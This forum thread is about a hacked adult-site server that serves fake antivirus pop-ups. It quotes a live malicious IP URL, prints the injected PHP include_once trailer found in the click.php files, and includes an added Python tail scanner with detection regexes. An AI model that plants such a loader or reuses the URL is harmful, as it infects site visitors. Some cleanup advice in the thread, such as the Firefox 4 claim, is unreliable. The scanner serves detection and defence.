Virus/Hack

  • milo99
    Registered User
    • Aug 2010
    • 48

    #1

    Virus/Hack

    Hey guys, dealing with a brutal hack/virus. These guys are smart, as it usually only happens one time per IP. You could easily have this virus and you would never know it. I discovered it by accident. This is happening on my tubes that are using STP and TP; it is also happening on one of my TGPs using TGPX and A2, so it is likely server-based. There appears to be nothing out of the ordinary on my server. We have also locked down the server, only providing access from my IP, but it is still happening.
    When it loads you can actually see the gallery or tube start to load, then it takes over. You get pop-ups saying that your computer needs to be scanned for viruses, etc. The domain that loads is this one, so I am hoping it looks familiar to someone. I shouldn't have to say this, but **DO NOT LOAD THIS IN YOUR BROWSER**
    91.226.213.60/1bdeb97e93c47ab826ec1a82c1f427ed63041810d588f02f

    This one has me stumped; any help would be appreciated.

    Adult Webmasters Save Huge On Scripts & Services
    Buy | Sell | Request Deals | The only site of it's kind for our industry!
    Most of our deals are exclusive you CANNOT get them anywhere else!

    Anytime Guys: ICQ 670033471
  • Juicy D. Links
    So Fucking Banned
    • Apr 2001
    • 122992

    #2
    In case people don't see it:

    **DO NOT LOAD THIS IN YOUR BROWSER**

    • slizard
      Registered User
      • Jul 2003
      • 39

      #3
      It's not a hack. You probably sell traffic to TH.

      Each time someone goes to see TH's support about it, they don't know what we're talking about, saying they visited the offended sites and they saw nothing.

      In other words, they act and play stupid cuz they know what is going on, and they do jack shit about it cuz probably they have something to win in all that.

      And I'm supposed to believe that they know the difference between a real hit and a bot. LOL

      • slizard
        Registered User
        • Jul 2003
        • 39

        #4
        And for those who don't sell any traffic to TH and use free scripts, the skim % to pay for the script also goes to brokers...

        • milo99
          Registered User
          • Aug 2010
          • 48

          #5
          No, I don't sell traffic, and my trade scripts are paid ones, so there is no skim there either. Also, my tubes and TGPs trade with different sites altogether. This is not only happening on trades, as I can see my gallery or tube start to load in the background, then this thing takes over. One time it happened on a gallery that I made myself, so I know it is clean.
          Boy, this one is scary!
          Last edited by milo99; 06-17-2011, 09:30 AM.

          • spazlabz
            Confirmed User
            • Jul 2003
            • 6548

            #6
            Originally posted by Juicy D. Links
            In case people don't see it:

            **DO NOT LOAD THIS IN YOUR BROWSER**
            I wonder if I should load that in my browser

            Thanks Milo for the heads up

            • Harmon
              ( ͡ʘ╭͜ʖ╮͡ʘ)
              • Mar 2004
              • 20012

              #7
              It's porn industry hackers trying to eliminate the scum tube site operator sheep, so everybody can get back to actually making some serious money.

              Thanks for the warning, Juice

              • milo99
                Registered User
                • Aug 2010
                • 48

                #8
                Originally posted by Harmon
                It's porn industry hackers trying to eliminate the scum tube site operator sheep, so everybody can get back to actually making some serious money.

                Thanks for the warning, Juice
                Easy, my friend. This is an 11-year-old domain, and the TGP and tube are 100% legal.

                • Chosen
                  • Aug 2001
                  • 63151

                  #9
                  Originally posted by spazlabz
                  I wonder if I should load that in my browser

                  Thanks Milo for the heads up

                  • Chosen
                    • Aug 2001
                    • 63151

                    #10
                    milo99, what browser are you using?


                    • milo99
                      Registered User
                      • Aug 2010
                      • 48

                      #11
                      Originally posted by Chosen
                      milo99, what browser are you using?
                      I am on a Mac using FF; however, this also happened to the guy who makes my galleries, who is on a PC using Chrome.

                      • AdultKing
                        Raise Your Weapon
                        • Jun 2003
                        • 15601

                        #12
                        It can be really hard to detect changes on a well-hacked server; you really need to check everything twice or three times as you move it all to a fresh machine. If it is server-based, you could never trust that installation again.

                        I assume you have run all the rootkit checkers etc. on the system for clues?

                        • milo99
                          Registered User
                          • Aug 2010
                          • 48

                          #13
                          Yes, my host has been running checks since this started, but with no luck. Anyone recommend someone who specializes in this kind of thing?

                          • harvey
                            Confirmed User
                            • Jul 2001
                            • 9266

                            #14
                            We cleaned it last week from a client's server, but the motherfucker infected my computer and it took me 2 days to clean everything. You probably got it from an image redirect; it's the new trend.

                            Anyway, it's a very tedious task, but look for each and every strange file on your server. Then open your PHP and HTML files and look at the bottom; you'll probably find an image src (or, depending on the version, some JS). Delete it.

                            Now check your site using Chrome or Safari. DO NOT USE IEXPLOITER (why would anyone?) and, sad to say, DO NOT USE FIREFOX 4! It has a bug that allows images to load as exe.

                            If it's clean, time to clean your PC. The only antivirus I know of that catches it is ESET NOD, but maybe other antivirus programs have been updated. This is what I did:

                            1) Log in in safe mode
                            2) Run SuperAntispyware
                            3) Run ESET NOD (you can run your AV program)
                            4) Check the registry and clean up a couple of leftover entries

                            Once you do that and your computer is clean, have your FTP password changed. DO NOT LOG IN TO YOUR SERVER VIA FTP UNTIL YOU DO THIS! Use a very hard-to-guess key, and if your server allows SFTP, then USE IT!

                            If everything goes fine, your server and PC will be clean and you're safe to go.

                            As a general precaution: do not pay attention to "server techs". 90% of them are morons who can't even turn on a computer, much less know about servers. And the chances of you getting one of the remaining 10% are really slim.
                            This post is endorsed by CIA, KGB, MI6, the Mafia, Illuminati, Kim Jong Il, Worldwide Ninjas Association, Klingon Empire and lolcats. Don't mess around with it, just accept it and embrace the truth.

                            • milo99
                              Registered User
                              • Aug 2010
                              • 48

                              #15
                              I think we found this nasty thing. All of my click.php files for TGPX had this attached to them...

                              $qall=1;$qscr='click.php';@include_once('/tmp/.ICE-unix/err.tmp');

                              This was a server hack. Keep 'em locked up tight!

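The two things the thread says to look for (harvey in #14: an image src or script tacked onto the end of PHP/HTML files; milo99 in #15: an `@include_once('/tmp/.ICE-unix/err.tmp')` trailer appended to every click.php) are both "something odd in the last few lines of a web file". The scanner below is an added example written for this page, not code from the thread or from TGPX; it walks a web root, looks only at the tail of each file, and flags PHP includes that pull from a scratch or dot-directory and HTML tags that load a resource by bare IP address. The regexes are heuristics I chose for this example, and the sample files and the 192.0.2.10 address are constructed (TEST-NET) data, not from the thread.

```python
"""Tail scanner for the injection pattern described in the thread:
PHP files given a trailing include from a world-writable scratch directory,
and HTML/PHP files given a trailing <img>/<script>/<iframe> loading from a bare IP."""
import os
import re
import tempfile
from pathlib import Path

# PHP side. The thread's exact trailer was
#   $qall=1;$qscr='click.php';@include_once('/tmp/.ICE-unix/err.tmp');
# The regex generalises it (assumption): any include/require whose target sits under
# /tmp, /var/tmp or /dev/shm, or inside a dot-directory such as /.ICE-unix/.
PHP_INCLUDE_RE = re.compile(
    r"""@?\s*(?:include|require)(?:_once)?\s*\(?\s*['"]"""
    r"""(?P<path>(?:/tmp/|/var/tmp/|/dev/shm/)[^'"]*|[^'"]*/\.[^/'"]+/[^'"]*)['"]""",
    re.IGNORECASE,
)
# HTML side: a tag whose src is an http(s) or protocol-relative URL with a bare IPv4 host.
HTML_REMOTE_RE = re.compile(
    r"""<(?:img|script|iframe)\b[^>]*\bsrc\s*=\s*['"]?"""
    r"""(?P<url>(?:https?:)?//\d{1,3}(?:\.\d{1,3}){3}[^'"\s>]*)""",
    re.IGNORECASE,
)
TAIL_BYTES = 2048  # only the end of each file is examined, as the thread suggests


def scan_text(name, text):
    """Return a list of (file, kind, detail) findings for one file's content."""
    tail = text[-TAIL_BYTES:]
    findings = []
    lname = name.lower()
    if lname.endswith((".php", ".phtml", ".inc")):
        for m in PHP_INCLUDE_RE.finditer(tail):
            findings.append((name, "php-include-from-scratch-dir", m.group("path")))
    if lname.endswith((".html", ".htm", ".php")):
        for m in HTML_REMOTE_RE.finditer(tail):
            findings.append((name, "html-remote-resource-by-ip", m.group("url")))
    return findings


def scan_tree(root):
    """Walk a web root and collect findings, with paths relative to the root."""
    root = Path(root)
    findings = []
    for dirpath, _, files in os.walk(root):
        for f in files:
            p = Path(dirpath) / f
            try:
                text = p.read_text(errors="replace")
            except OSError:
                continue  # unreadable file: skip rather than abort the whole scan
            findings.extend(scan_text(p.relative_to(root).as_posix(), text))
    return findings


def demo():
    """Build a constructed web root in a temp dir and scan it.
    All files here are made up for this example; only the include_once trailer
    is the line quoted in the thread. 192.0.2.10 is a TEST-NET address."""
    root = Path(tempfile.mkdtemp())
    (root / "tgpx").mkdir()
    redirect = "<?php\n$id = (int)$_GET['id'];\nheader('Location: /out/' . $id);\n"
    (root / "tgpx" / "clean.php").write_text(redirect)
    (root / "tgpx" / "click.php").write_text(
        redirect + "$qall=1;$qscr='click.php';@include_once('/tmp/.ICE-unix/err.tmp');\n"
    )
    (root / "gallery.html").write_text(
        '<html><body><img src="pic1.jpg"><img src="pic2.jpg"></body></html>\n'
        '<img src="http://192.0.2.10/a1b2c3" width=1 height=1>\n'
    )
    return sorted(scan_tree(root))


if __name__ == "__main__":
    for name, kind, detail in demo():
        print(f"{name}: {kind} -> {detail}")
```

Run it against a real docroot by calling `scan_tree("/var/www/html")` (path is an assumption). A clean hit list is not proof of a clean server, since the thread also notes ionCube-encoded payloads that plain text search will not see; treat the scanner as a quick triage step before the file-by-file review and the fresh-machine rebuild that AdultKing and harvey describe.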

                              • Horny Guy
                                Confirmed User
                                • Jan 2002
                                • 1677

                                #16
                                Check your home router DNS settings also, and reset the router password...

                                They get into your server using your IP at your home also.
                                Great hosting and Lots of Ip's

                                • milo99
                                  Registered User
                                  • Aug 2010
                                  • 48

                                  #17
                                  Originally posted by Horny Guy
                                  Check your home router DNS settings also, and reset the router password...

                                  They get into your server using your IP at your home also.
                                  Thanks, will do.
                                  I am hoping this was just a permissions thing, as the click.php files on other domains that had the correct file permissions appear untouched.

                                  • V_RocKs
                                    Damn Right I Kiss Ass!
                                    • Nov 2003
                                    • 32449

                                    #18
                                    Hacking is fun


                                    • r34lg33k
                                      Registered User
                                      • Jan 2005
                                      • 29

                                      #19
                                      You need to clear your cookies, whichever browser you are using; it's a 1-occurrence-a-day / IP payload.
                                      We've recently observed these files in TradePulse's /tp/ installation directory as well; easier to spot with ioncube loading in a non-ioncube app. Not likely to come up with search tools; an ioncube-encoded payload means scanning it is a bit of a pain. A more permanent solution could be to turn ioncube load off, but that's not an option given that you already want to run SmartThumbs/SmartTubes.
                                      # icq 2.333.686 - www.CheeChTech.com
                                      # Coding: PhP Perl Java JavaScript Flash SOAP C/C++
                                      # SysAdmin: linux & freebsd

                                      • seeandsee
                                        Check SIG!
                                        • Mar 2006
                                        • 50945

                                        #20
                                        Just one way to find out what is going on: pay some expert!
                                        BUY MY SIG - 50$/Year

                                        Contact here